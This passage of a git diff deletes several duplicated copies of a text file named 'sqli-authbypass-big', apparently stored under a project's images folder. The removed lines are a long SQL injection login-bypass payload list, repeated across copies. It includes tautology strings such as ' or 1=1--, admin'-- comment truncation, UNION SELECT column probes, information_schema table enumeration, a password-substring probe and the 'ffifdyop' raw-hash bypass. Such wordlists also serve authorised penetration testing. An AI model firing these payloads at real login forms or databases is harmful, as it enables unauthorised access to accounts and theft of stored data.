-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
